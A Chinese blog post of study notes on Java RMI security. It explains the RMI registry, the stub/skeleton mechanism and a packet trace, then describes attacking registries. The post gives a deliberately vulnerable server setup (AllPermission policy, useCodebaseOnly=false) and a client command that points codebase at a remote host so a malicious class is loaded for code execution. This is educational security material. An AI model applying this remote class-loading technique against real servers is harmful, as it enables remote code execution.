【学习笔记】Java安全之RMI

已于 2023-05-30 15:28:42 修改 479 收藏 1
分类专栏: Java 文章标签: Java RMI
于 2023-04-17 17:55:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/130034496
版权

最近在看Phith0n师傅的知识星球的Java安全漫谈系列,随手记下笔记

RMI全称远程方法调用(Remote Method Invocation)。这是允许驻留在一个系统(JVM)中的对象调用在另一个JVM上运行的对象的一种机制,能够远程调用远程对象的方法。

RMI通信过程、原理

我们首先来分析下RMI的流程:

首先编写一个RMI Server

package RMI_Test;

import java.rmi.Naming;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.server.UnicastRemoteObject;

public class RMIServer {
    public interface IRemoteHelloWorld extends Remote {
        public String hello() throws RemoteException;
    }

    public class RemoteHelloWorld extends UnicastRemoteObject implements IRemoteHelloWorld {
        protected RemoteHelloWorld() throws RemoteException {
            super();
        }

        public String hello() throws RemoteException {
            System.out.println("call from");
            return "Hello, World";
        }
    }

    private void start() throws Exception {
        RemoteHelloWorld h = new RemoteHelloWorld();
        LocateRegistry.createRegistry(1099);
        Naming.rebind("rmi://127.0.0.1:1099/Hello", h);
    }

    public static void main(String[] args) throws Exception {
        new RMIServer().start();
    }
}

一个RMI Server的过程分为以下三个步骤:

  • 首先继承了java.rmi.Remote的接口,其中定义需要远程调用的方法,例如这里的hello()
  • 其次需要使用java.rmi.Remote的接口
  • 定义一个主类,用来创建Registry,并将上面的类实例化后绑定到一个地址

接着编写一个RMI Client:

package RMI_Test;

import java.rmi.Naming;

public class RMIClient {
    public static void main(String[] args) throws Exception {
        RMIServer.IRemoteHelloWorld hello = (RMIServer.IRemoteHelloWorld) Naming.lookup("rmi://192.168.7.2:1099/Hello");
        String ret = hello.hello();
        System.out.println(ret);
    }
}

客户端使用Naming.lookupRegistry中寻找到名字是Hello的对象,这里虽说是执行远程方法的时候代码是在远程服务器上执行的,但实际上还是需要知道有哪些方法,这时候接口的重要性就体现了,这也是为什么需要继承Remote并将我们需要调用的方法写在接口IRemoteHelloWorld里,因为客户端也需要用到这个接口。

这里使用WrireShark抓包来分析理解RMI的通信过程:

选择回环口
在这里插入图片描述

在这里插入图片描述

这就是RMI完整的通信过程,可以发现整个过程进行了两次TCP握手,也就是建立了两次TCP连接

第一次建立TCP连接是连接到远端192.168.135.1421099端口,这也是服务端设置的端口(1099是RMI通信的默认端口),连接后客户端向远端发送了一个Call消息,远端回复了一个ReturnData消息,然后客户端新建了一个TCP连接到远端的24641端口

那么为什么会连接24641端口呢?,在ReturnData这个包中,返回了目标的IP地址192.168.7.2,其后的两个字节就是24641的十六进制:

>>> int("6041", 16)
24641

在这里插入图片描述

这段数据从ac ed开始往后就是Java序列化数据了,IP和端口只是这个对象的一部分,捋一捋这整个过程:

  • 首先客户端连接Registry,并在其中寻找Name是Hello的对象,这个对应数据流中的Call消息;然后Registry返回一个序列化数据,这个就是找到的Name=Hello的对象,这个对应数据流中的ReturnData消息;客户端反序列化该对象,发现该对象是一个远程对象,地址在192.168.7.2:24641,于是再与这个地址建立TCP连接,在这个新的连接中,才执行真正的方法调用,也就是hello()

在这里插入图片描述
RMI Registry就像一个网关,它自己是不会执行远程方法的,但是RMI Server可以在上面注册一个Name到对象的绑定关系RMI Client通过Name向RMI Registry查询,得到这个绑定关系,然后再连接RMI Server;最后,远程方法实际上在RMI Server上调用。

接下来来看下RMI的底层架构是如何实现的:

在这里插入图片描述

RMI底层通讯采用了Stub(运行在客户端)Skeleton(运行在服务端)机制,RMI调用远程方法的底层通讯大致如下:

  1. RMI客户端在调用远程方法时会先创建Stub(sun.rmi.registry.RegistryImpl_Stub)
  2. Stub会将Remote对象传递给远程引用层(java.rmi.server.RemoteRef)并创建java.rmi.server.RemoteCall(远程调用)对象
  3. RemoteCall序列化RMI服务名称Remote对象
  4. RMI客户端远程引用层传输RemoteCall序列化后的请求信息通过Socket连接的方式传输到RMI服务端远程引用层
  5. RMI服务端远程引用层(sun.rmi.server.UnicastServerRef)收到请求会请求传递给Skeleton(sun.rmi.registry.RegistryImpl_Skel#dispatch)
  6. Skeleton调用RemoteCall反序列化RMI客户端传过来的序列化
  7. Skeleton处理客户端请求:bindlistlookuprebindunbind,如果是lookup则查找RMI服务名绑定的接口对象,序列化该对象并通过RemoteCall传输到客户端
  8. RMI客户端反序列化服务端结果,获取远程对象的引用
  9. RMI客户端调用远程方法,RMI服务端反射调用RMI服务实现类的对应方法并序列化执行结果返回给客户端
  10. RMI客户端反序列化RMI远程方法调用结果

如何攻击RMI Registry?

首先,RMI Registry是一个远程对象管理的地方,可以理解为一个远程对象的”后台“,当我们尝试直接访问”后台“功能,如果尝试直接访问”后台“功能,会出现报错,因为Java对远程访问RMI Registry做了限制,只有来源地址是localhost的时候,才能调用rebindbindunbind等方法,不过listlookup方法可以远程调用。

lookup的作用就是获取某个远程对象,那么只要目标服务器上存在一些危险方法,我们就可以通过RMI对其进行调用,例如工具:https://github.com/NickstaDB/BaRMIe,其中一个功能就是进行危险方法的探测。

RMI利用codebase执行任意代码

Applet是采用Java编程语言编写的小应用程序,该程序可以包含在 HTML(标准通用标记语言的一个应用)页中,与在页中包含图像的方式大致相同。含有Applet的网页的HTML文件代码中部带有<applet></applet>这样一对标记,当支持Java的网络浏览器遇到这对标记时,就将下载相应的小应用程序代码并在本地计算机上执行该Applet。

<applet code="HelloWorld.class" codebase="Applets" width="800" height="600"></applet>

在使用Applet的时候通常需要指定一个codebase属性,而RMI在远程加载的场景中,也会涉及到codebasecodebase是一个地址,告诉Java虚拟机前往指定的地址搜索类,类似CLASSPATH,但是CLASSPATH是本地路径,而codebase通常是远程URL

例如指定codebase=http://example.com/,然后加载org.vulhub.example.Example类,则Java虚拟机会下载这个文件http://example.com/org/vulhub/example/Example.class,并作为Example类的字节码

在RMI的流程中,客户端和服务端之间传递的是一些序列化后的对象,这些对象在反序列化时,就回去寻找类,如果某一段反序列化时发现一个对象,那么就回去本地CLASSPATH下寻找相对应的类;如果在本地没有找到这个类,就会去远程加载codebase中的类。

如果控制了codebase,就可以加载自己构造的恶意类,可以将codebase随着序列化数据一起传输,服务器在接收到这个数据后就会去CLASSPATH和指定的codebase寻找类,导致RCE

不过需要满足如下条件的RMI服务器才能被攻击:

  • 安装并配置了SecurityManager
  • Java版本低于7u216u45或者设置了java.rmi.server.useCodebaseOnly=false
    其中java.rmi.server.useCodebaseOnly是在Java 7u216u45的时候修改的一个默认配置,官方将java.rmi.server.useCodebaseOnly的默认值由false改为了true。在java.rmi.server.useCodebaseOnly配置为true的情况下,Java虚拟机将只信任预先配置好的codebase,不再支持从RMI请求中获取。

这里Phith0n师傅提供了一个案例:
服务端:

import java.rmi.Remote;
import java.rmi.RemoteException;
import java.util.List;

public interface ICalc extends Remote {
    public Integer sum(List<Integer> params) throws RemoteException;
}

import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;
import java.util.List;

public class Calc extends UnicastRemoteObject implements ICalc {
    public Calc() throws RemoteException {}

    public Integer sum(List<Integer> params) throws RemoteException {
        Integer sum = 0;
        for (Integer param : params) {
            sum += param;
        }
        return sum;
    }
}

import java.rmi.Naming;
import java.rmi.registry.LocateRegistry;

public class RemoteRMIServer {
    private void start() throws Exception {
        if (System.getSecurityManager() == null) {
            System.out.println("setup SecurityManager");
            System.setSecurityManager(new SecurityManager());
        }

        Calc h = new Calc();
        LocateRegistry.createRegistry(1099);
        Naming.rebind("refObj", h);
    }

    public static void main(String[] args) throws Exception {
        new RemoteRMIServer().start();
    }
}

client.policy,放在jdk1.8.0_341\jre\lib\security\下,不过运行的时候最好用绝对路径

grant {
	permission java.security.AllPermission;
};

运行

javac *.java
java -Djava.rmi.server.hostname=192.168.135.142 -Djava.rmi.server.useCodebaseOnly=false -Djava.security.policy=client.policy RemoteRMIServer

客户端

import java.io.Serializable;
import java.rmi.Naming;
import java.util.ArrayList;
import java.util.List;

public class RMIClient implements Serializable {
    public class Payload extends ArrayList<Integer> {}

    public void lookup() throws Exception {
        ICalc r = (ICalc) Naming.lookup("rmi://192.168.50.3:1099/refObj");
        List<Integer> li = new Payload();
        li.add(3);
        li.add(4);

        System.out.println(r.sum(li));
    }

    public static void main(String[] args) throws Exception {
        new RMIClient().lookup();
    }
}

这个Client我们需要在另一个位置运行,因为我们需要让RMI Server在本地CLASSPATH里找不到类,才
会去加载codebase中的类,所以不能将RMIClient.java放在RMI Server所在的目录中。

java -Djava.rmi.server.useCodebaseOnly=false -Djava.rmi.server.codebase=http://example.com/ RMIClient

我们只需要编译一个恶意类,将其class文件放置在Web服务器的/RMIClient$Payload.class即可。

不过我这里并没有执行成功,尝试过很多解决方法都不行(java版本问题,classpath问题,目录问题都尝试过),如果有师傅这一步能成功加载到codebase的,希望通过以下联系方式加个好友,想请教下,谢谢

阅读终点,创作起航,您可以撰写心得或摘录文章要点写篇博文。去创作
末 初
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
RMI远程方法实现
11-07
RMI远程方法的实现,客户端调用未添加
rmi-client-server:RMI 客户端和服务器的简单 Java 实现
05-31
rmi-客户端-服务器 RMI 客户端和服务器的简单 Java 实现 服务器 shell 脚本会将服务器库编译为 jar,然后运行服务器。 像这样运行它: ./server.sh 现在启动客户端: ./client.sh 客户端当前实现为 Groovy 脚本,如果您更喜欢将其作为 java 运行,只需将扩展名更改为 .java 并编译和运行。 请注意类路径,必须添加 pwd(.) 和 jar,并由依赖于操作系统的路径 ep 分隔。 在 linux 上使用冒号,在 windows 上使用分号。 javac -cp server.jar Client.java java -cp ".:server.jar" Client
g-rmi_使用Java RMI时要记住的两件事
cunfen9460的博客
12-11 143
g-rmi 这是一篇简短的博客文章,介绍了使用Java RMI时应注意的两个常见陷阱。 设置java.rmi.server.hostname 如果您感到奇怪,Connection拒绝托管: RMI客户端上的错误消息,并且您确定连接应该正常工作(您仔细检查了所有标准配置,例如网络配置等)。RMI系统属性java.rmi.server.hostname值得研究。 要在远程对象上调用方法,RMI客...
Java RMI 实现远程连接服务器的配置方法
JianguoChow的博客
05-23 1万+
错误特征:java.rmi.ConnectException: Connection refused to host: 192.168.0.3; nested exception is: java.net.ConnectException: Connection timed out: connect at sun.rmi.transport.tcp.TCPEndpoint.newSocket(U...
java rmi 多ip,强制RMIService与特定IP地址绑定
weixin_34284072的博客
02-16 459
I implemented RMIService using Spring RMIServiceExporter running at port 4099. When I start my Jboss , RMI Service is getting bonded to 0.0.0.0:4099 instead of 127.0.0.1:4099. I tried different parame...
Java rmi-codebase记录
AsagiRiAsagi的博客
03-16 176
不得不承认能学会这么多利用姿势全靠站在巨人的肩膀上8u191后的JNDI注入利用:这篇文章介绍的RMI攻击方法在低版本比较适用搞懂RMI、JRMP、JNDI-终结篇:三梦师傅的文章,更侧重代码调试和RMI的原理,写文章的思路也是针对JNDI利用,按照不同的jdk版本介绍相应的攻击手法。Java RMI远程利用分析:长亭师傅写的文章,主要在死磕rmi服务这块给了不少思路,缺点是代码和命令贴的不是很全一次攻击内网rmi服务的深思bsmali4师傅写的,关于如何绕JEP290写的相当详细。
使用Java RMI时要记住的两件事
最佳 Java 编程
05-18 2720
这是一篇简短的博客文章,介绍使用Java RMI时应注意的两个常见陷阱。 设置java.rmi.server.hostname 如果您感到陌生,Connection拒绝托管: RMI客户端上的错误消息,并且您确定连接应该正常工作(您仔细检查了所有标准配置,例如网络配置等)。RMI系统属性java.rmi.server.hostname值得研究。 要在远程对象上调用方法,RMI客户端...
JMX 远程连接
weixin_34311757的博客
08-17 182
为什么80%的码农都做不了架构师?>>> ...
Java代码审计——RMI基础利用
王嘟嘟的博客
12-23 1878
可以先看。
JavaRMI入门详细
weixin_46361305的博客
12-22 2610
JavaRMi入门超详细
RMI中的属性说明
huiwen_82132000的专栏
07-03 183
服务端属性 下面的表格包含了一个用于服务端配置的典型列表。注意:当这些属性用于applets时是受限的。 java.rmi.server.codebase 用于指定来源于JVM中类的codebase URL.此属性用于为类注解来自于哪个JVM描述,以使得在远程方法调用中作为参数或返回值发送的对象的类能够被接收端加载。 java.rmi.server.disableHttp ...
Java 远程方法调用 RMI
王鹏亮 的专栏
03-26 5184
概述 rmi是一种多个计算机之间利用远程对象互相调用实现双方通信的机制,rmi使得一台计算机上的对象调用另外一台计算机上的对象非常方便。 著名的 EJB 就是基于rmi实现的,可以说 rmijava建立 分布式应用 的方便途径和有力武器! RMI开发步骤 1.建立远程调用接口并声明方法,注意:这是双方通信的接口,需要继承java.rmi.Remote 2.开发远上述程接口的实现类,注
通过spring设置java系统属性
ChinFeng的专栏
10-09 4574
在做RMI的时候需要如遇到rmi所在服务是多网卡时,需要对系统属性java.rmi.server.hostname进行设置 ,以前我们会扩展spring的listener public class SpringContextLoaderListener extends ContextLoaderListener { @Override public void contextInitia
Linux下运行java RMI程序
最佳损友1020的博客
03-20 623
Linux下运行java程序安装java运行java程序示例 安装java 下载jdk 由于Oracle官网下载速度过慢,故在华为镜像站下载jdk https://repo.huaweicloud.com/java/jdk/ 下载成功后用xftp传至服务器上 将压缩包解压 tar -zxvf /usr/local/jdk-8u181-linux-x64.tar.gz 修改配置文件 vim /e...
Java RMI 入门
暗诺星刻的博客
02-02 1141
Java RMI 入门如何通信实战   Java RMIJava 中远程方法调用(Remote Method Invocation)。通过 Java RMI,可以直接在客户端调用服务端的方法,并获得其返回值。Java RMI 是 RPC(Remote procedure call) 技术的 Java 实现,它提供了一种非常便捷的方式在 Java 中实现 RPC。   使用 RMI 之前,需要知道以下概念: 服务端 服务端的暴露方法 客户端   RMI 可以让客户端调用位于服务端的暴露方
jmeter分布式测试配置
xieyukun135的博客
12-11 657
分机配置 1、执行配置文件:bin\jmeter.properties 文件 2、配置远程端口号,{jmeter默认端口号1099,可以不进行配置} 3、运行jmeter-server.bat 程序 4、设置远程执行模式 设置配置文件:#mode=Standard前面的#注释去掉 #server.rmi.ssl.disable=false 修改为:server.rmi.ssl.disable=true并且将前面的#注释去掉 总机配置 1、执行配置文件:bin\jmeter.pro...
jmx监控配置
shawdow_bless的专栏
03-14 1317
jmx监控配置 Java启动参数配置 -Djava.rmi.server.hostname=192.168.110.123 -Dcom.sun.management.jmxremote=true -Dcom.sun.management.jmxremote.rmi.port=10086 -Dcom.sun.management.jmxremote.port=10086 -Dcom.sun.m...
关于RMI的几个问题解决
热门推荐
fbysss的专栏
06-04 1万+
1.多网卡导致的RMI连接问题: Caused by: java.rmi.ConnectException: Connection refused to host: xx.xx.xx.xxx; nested exception is:         java.net.ConnectException: Connection timed out: connect        at
RMI
luke_wang的专栏
02-04 1521
RMI = RPC + Serializable RMI(Remote Method Invocation)为远程方法调用,是允许运行在一个Java虚拟机的对象调用运行在另一个Java虚拟机上的对象的方法。 这两个虚拟机可以是运行在相同计算机上的不同进程中,也可以是运行在网络上的不同计算机中。RMI使用Java远程消息交换协议JRMP(Java Remote Messaging Protocol
java-rmi 漏洞
最新发布
07-14
### 回答1: Java RMI(远程方法调用)是一种用于在分布式系统中进行远程通信的Java API。虽然它提供了方便的远程方法调用功能,但也存在一些安全漏洞。 其中一个漏洞是未经授权的远程方法调用(Unauthorized Remote Method Invocation)。在Java RMI中,远程对象可以通过URL公开,并接受来自任何Java虚拟机的调用。如果没有正确的安全措施,攻击者可以利用这个漏洞,通过发送恶意请求来执行未经授权的远程方法调用。这可能导致敏感数据泄露、服务拒绝、远程代码执行等安全风险。 另一个漏洞是远程代码执行(Remote Code Execution)。由于Java RMI允许将类作为参数传递给远程方法调用,攻击者可以通过构建恶意类来在远程系统中执行任意代码。这可能会导致远程系统被完全控制,从而对系统进行非法操作、运行恶意软件等。 为了防止这些漏洞,应采取以下安全措施: 1.授权策略:通过使用Java RMI安全管理器,对远程调用进行授权验证。只允许受信任的主机或用户执行远程方法调用。 2.数据验证:在接受远程方法调用之前,对传入的数据进行验证和过滤,以防止恶意输入。 3.安全传输层:使用安全通信协议(如SSL/TLS)对Java RMI进行加密,以保护数据在网络传输过程中的安全性。 4.类过滤:限制远程对象所需的类只能从特定的类路径加载,以防止远程代码执行。 总之,Java RMI漏洞存在一定的风险,但通过使用适当的安全措施可以有效地减少这些风险。 ### 回答2: Java RMI (Remote Method Invocation)是Java中用于远程调用方法的技术,它允许在不同主机上的Java虚拟机之间进行通信和交互。然而,Java RMI中存在一些漏洞,可能导致安全问题。下面是一些常见的Java RMI漏洞: 1. 未授权访问:在没有适当访问控制的情况下,攻击者可能能够直接访问Java RMI服务,获取敏感信息或执行恶意操作。 2. 服务猝死:如果不正确地实现了Java RMI服务,攻击者可能通过发送恶意请求来导致服务崩溃或拒绝服务,导致系统不可用。 3. 反序列化漏洞:由于Java RMI使用Java序列化来传输对象,因此未进行适当的反序列化验证可能导致反序列化漏洞,攻击者可以利用此漏洞在目标系统上执行任意代码。 4. 中间人攻击:由于Java RMI缺乏加密机制,攻击者可能能够拦截和篡改Java RMI通信,以获取敏感信息或篡改数据。 为了解决这些漏洞,可以采取以下措施: 1. 实施访问控制:确保只有经过授权的用户能够访问Java RMI服务,并且只有必要的方法和数据暴露给客户端。 2. 安全配置:在构建Java RMI服务时,应遵循安全最佳实践,确保已正确配置安全管理器和策略文件,以限制服务的操作和访问范围。 3. 验证和过滤输入:在处理Java RMI请求时,始终进行输入验证和过滤,以防止恶意输入和攻击。 4. 反序列化信任:避免直接反序列化不受信任的数据,可以使用白名单或其他验证机制来限制反序列化操作。 5. 加密通信:考虑使用安全的通信协议(如SSL/TLS)来保护Java RMI通信的机密性和完整性,以防止中间人攻击。 总之,了解Java RMI漏洞并采取适当的防护措施是确保Java RMI应用程序安全的重要步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值